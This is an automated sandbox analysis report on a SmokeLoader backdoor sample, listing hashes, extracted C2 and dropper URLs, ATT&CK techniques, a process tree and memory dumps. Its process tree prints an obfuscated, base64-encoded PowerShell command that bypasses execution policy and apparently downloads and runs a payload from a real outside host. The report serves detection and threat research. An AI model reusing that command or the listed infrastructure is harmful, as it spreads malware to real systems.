smokeloader | 5de2819f832f06f69009b07779eacabc1b171540b10689b4b23eaac8f3232e14

General

Target

9fbd32c6bb25f6a660696fa9830c5040.exe
Size

847KB
MD5

9fbd32c6bb25f6a660696fa9830c5040
SHA1

1e41347d36792e823a8982b10170d83a0722e3cc
SHA256

5de2819f832f06f69009b07779eacabc1b171540b10689b4b23eaac8f3232e14
SHA512

3b89b40676449390bfdc139aad1ac664cf14213eeed32dfa8e06671a8bcc97fe6facd42331657bdc220a9e38fee2021b1ea7a1c2ace6b89ec5d31d488eb2bdfb

Score

10^/10

smokeloader backdoor trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://u.teknik.io/28oLW.jpg

Extracted

Family

smokeloader

Version

2018

C2

http://94.140.115.43/1/

rc4.i32

Signatures

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

12 2380 powershell.exe
Executes dropped EXE 1 IoCs

Processes:

eVDwACBtpW.exe

pid process

2900 eVDwACBtpW.exe

flow	pid	process
12	2380	powershell.exe

pid	process
2900	eVDwACBtpW.exe

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

eVDwACBtpW.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	eVDwACBtpW.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	eVDwACBtpW.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exe

pid process

864 powershell.exe
864 powershell.exe
864 powershell.exe
2380 powershell.exe
2380 powershell.exe
2380 powershell.exe
Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

eVDwACBtpW.exe

pid process

2900 eVDwACBtpW.exe
2900 eVDwACBtpW.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 864 powershell.exe
Token: SeDebugPrivilege 2380 powershell.exe

pid	process
864	powershell.exe
864	powershell.exe
864	powershell.exe
2380	powershell.exe
2380	powershell.exe
2380	powershell.exe

pid	process
2900	eVDwACBtpW.exe
2900	eVDwACBtpW.exe

description	pid	process
Token: SeDebugPrivilege	864	powershell.exe
Token: SeDebugPrivilege	2380	powershell.exe

Suspicious use of FindShellTrayWindow 11 IoCs

Processes:

9fbd32c6bb25f6a660696fa9830c5040.exe

pid	process
3680	9fbd32c6bb25f6a660696fa9830c5040.exe
3680	9fbd32c6bb25f6a660696fa9830c5040.exe
3680	9fbd32c6bb25f6a660696fa9830c5040.exe
3680	9fbd32c6bb25f6a660696fa9830c5040.exe
3680	9fbd32c6bb25f6a660696fa9830c5040.exe
3680	9fbd32c6bb25f6a660696fa9830c5040.exe
3680	9fbd32c6bb25f6a660696fa9830c5040.exe
3680	9fbd32c6bb25f6a660696fa9830c5040.exe
3680	9fbd32c6bb25f6a660696fa9830c5040.exe
3680	9fbd32c6bb25f6a660696fa9830c5040.exe
3680	9fbd32c6bb25f6a660696fa9830c5040.exe

Suspicious use of SendNotifyMessage 11 IoCs

Processes:

9fbd32c6bb25f6a660696fa9830c5040.exe

pid	process
3680	9fbd32c6bb25f6a660696fa9830c5040.exe
3680	9fbd32c6bb25f6a660696fa9830c5040.exe
3680	9fbd32c6bb25f6a660696fa9830c5040.exe
3680	9fbd32c6bb25f6a660696fa9830c5040.exe
3680	9fbd32c6bb25f6a660696fa9830c5040.exe
3680	9fbd32c6bb25f6a660696fa9830c5040.exe
3680	9fbd32c6bb25f6a660696fa9830c5040.exe
3680	9fbd32c6bb25f6a660696fa9830c5040.exe
3680	9fbd32c6bb25f6a660696fa9830c5040.exe
3680	9fbd32c6bb25f6a660696fa9830c5040.exe
3680	9fbd32c6bb25f6a660696fa9830c5040.exe

Suspicious use of WriteProcessMemory 9 IoCs

Processes:

9fbd32c6bb25f6a660696fa9830c5040.exepowershell.exepowershell.exe

description	pid	process	target process
PID 3680 wrote to memory of 864	3680	9fbd32c6bb25f6a660696fa9830c5040.exe	powershell.exe
PID 3680 wrote to memory of 864	3680	9fbd32c6bb25f6a660696fa9830c5040.exe	powershell.exe
PID 3680 wrote to memory of 864	3680	9fbd32c6bb25f6a660696fa9830c5040.exe	powershell.exe
PID 864 wrote to memory of 2380	864	powershell.exe	powershell.exe
PID 864 wrote to memory of 2380	864	powershell.exe	powershell.exe
PID 864 wrote to memory of 2380	864	powershell.exe	powershell.exe
PID 2380 wrote to memory of 2900	2380	powershell.exe	eVDwACBtpW.exe
PID 2380 wrote to memory of 2900	2380	powershell.exe	eVDwACBtpW.exe
PID 2380 wrote to memory of 2900	2380	powershell.exe	eVDwACBtpW.exe

C:\Users\Admin\AppData\Local\Temp\9fbd32c6bb25f6a660696fa9830c5040.exe
"C:\Users\Admin\AppData\Local\Temp\9fbd32c6bb25f6a660696fa9830c5040.exe"
1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3680

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe PowERsHEL`l -ExecutionPolicy Bypass -w 1 /`e IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwAHMAOgAvAC8AdQAuAHQAZQBrAG4AaQBrAC4AaQBvAC8AMgA4AG8ATABXAC4AagBwAGcAHSAgACwAIAAdICQARQBOAHYAOgB0AGUAbQBwAFwAZQBWAEQAdwBBAEMAQgB0AHAAVwAuAGUAeABlAB0gIAApACAAOwAgAHMAdABBAFIAdAAgAB0gJABFAE4AdgA6AHQAZQBtAHAAXABlAFYARAB3AEEAQwBCAHQAcABXAC4AZQB4AGUAHSA=
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:864

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 /e IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwAHMAOgAvAC8AdQAuAHQAZQBrAG4AaQBrAC4AaQBvAC8AMgA4AG8ATABXAC4AagBwAGcAHSAgACwAIAAdICQARQBOAHYAOgB0AGUAbQBwAFwAZQBWAEQAdwBBAEMAQgB0AHAAVwAuAGUAeABlAB0gIAApACAAOwAgAHMAdABBAFIAdAAgAB0gJABFAE4AdgA6AHQAZQBtAHAAXABlAFYARAB3AEEAQwBCAHQAcABXAC4AZQB4AGUAHSA=
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2380

C:\Users\Admin\AppData\Local\Temp\eVDwACBtpW.exe
"C:\Users\Admin\AppData\Local\Temp\eVDwACBtpW.exe"
4⤵
- Executes dropped EXE
- Maps connected drives based on registry
- Suspicious behavior: MapViewOfSection
PID:2900

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

Peripheral Device Discovery

1

T1120

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
MD5
b751492c41c6f3173d3b6f31c1b9b4eb

SHA1
abc53a2c939b1d774940deb0b888b7b1ba5a3c7b

SHA256
ad95fdf313324ed94997cec026239ea3631bf27298500e5def5941db9493b457

SHA512
afa65279455b98353c6fe6869f2b545231231a953afbb1bf2eaed6b11646c4b4c77c5c18102651ae247a2f0fa18c698d908f4d23ca91581cbf28e32e061cb2e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
11a543fc2734a50c10d3f25a890e62b8

SHA1
88c1fc8493037361178b23b497e705a675fae5f3

SHA256
c38f2f017185d32cacbff2cb52e22b84667b1895bf1c5fb17e6494324ebbae59

SHA512
fb222ce00e8cf10a774ea9bf64676a43f73d5f1c031177b2d854f3c7a94f19b133652d7857393ddb13ae690bee568d03cbed1506ae6a089a068b56adc3069891

Download Submit
C:\Users\Admin\AppData\Local\Temp\eVDwACBtpW.exe
MD5
0d1334075336455a13a36fd909417556

SHA1
4f1937f0eeeb697ef992547701295134fde65c20

SHA256
33d7fa2a8936cc5064b63592b77f87c02fcdc1396395ae2316e3a7c783523ad9

SHA512
d1f51355db6c4b040196b2588b8f21ef94d11901c7e8ea2c3632622adc791721d044c9a9448c8344406e5cbad2083f140caf9492d3dfef12724d22bb6e549971

Download Submit
C:\Users\Admin\AppData\Local\Temp\eVDwACBtpW.exe
MD5
0d1334075336455a13a36fd909417556

SHA1
4f1937f0eeeb697ef992547701295134fde65c20

SHA256
33d7fa2a8936cc5064b63592b77f87c02fcdc1396395ae2316e3a7c783523ad9

SHA512
d1f51355db6c4b040196b2588b8f21ef94d11901c7e8ea2c3632622adc791721d044c9a9448c8344406e5cbad2083f140caf9492d3dfef12724d22bb6e549971

Download Submit
memory/864-124-0x0000000007920000-0x0000000007921000-memory.dmp

Filesize
4KB

Download
memory/864-127-0x0000000008030000-0x0000000008031000-memory.dmp

Filesize
4KB

Download
memory/864-122-0x0000000006FF0000-0x0000000006FF1000-memory.dmp

Filesize
4KB

Download
memory/864-123-0x0000000007060000-0x0000000007061000-memory.dmp

Filesize
4KB

Download
memory/864-120-0x0000000006AD2000-0x0000000006AD3000-memory.dmp

Filesize
4KB

Download
memory/864-125-0x0000000007780000-0x0000000007781000-memory.dmp

Filesize
4KB

Download
memory/864-126-0x0000000007EA0000-0x0000000007EA1000-memory.dmp

Filesize
4KB

Download
memory/864-121-0x0000000006E50000-0x0000000006E51000-memory.dmp

Filesize
4KB

Download
memory/864-170-0x0000000006AD4000-0x0000000006AD6000-memory.dmp

Filesize
8KB

Download
memory/864-169-0x0000000006AD3000-0x0000000006AD4000-memory.dmp

Filesize
4KB

Download
memory/864-114-0x0000000000000000-mapping.dmp

Download
memory/864-119-0x0000000006AD0000-0x0000000006AD1000-memory.dmp

Filesize
4KB

Download
memory/864-118-0x0000000007110000-0x0000000007111000-memory.dmp

Filesize
4KB

Download
memory/864-117-0x00000000044E0000-0x00000000044E1000-memory.dmp

Filesize
4KB

Download
memory/2380-141-0x0000000004542000-0x0000000004543000-memory.dmp

Filesize
4KB

Download
memory/2380-154-0x000000000A090000-0x000000000A091000-memory.dmp

Filesize
4KB

Download
memory/2380-155-0x0000000004543000-0x0000000004544000-memory.dmp

Filesize
4KB

Download
memory/2380-153-0x0000000008FA0000-0x0000000008FA1000-memory.dmp

Filesize
4KB

Download
memory/2380-152-0x0000000009000000-0x0000000009001000-memory.dmp

Filesize
4KB

Download
memory/2380-147-0x0000000008AA0000-0x0000000008AA1000-memory.dmp

Filesize
4KB

Download
memory/2380-146-0x0000000009510000-0x0000000009511000-memory.dmp

Filesize
4KB

Download
memory/2380-140-0x0000000004540000-0x0000000004541000-memory.dmp

Filesize
4KB

Download
memory/2380-128-0x0000000000000000-mapping.dmp

Download
memory/2900-160-0x0000000000000000-mapping.dmp

Download
memory/3040-168-0x00000000011B0000-0x00000000011C5000-memory.dmp

Filesize
84KB

Download
memory/3040-167-0x00000000011D0000-0x00000000011D1000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads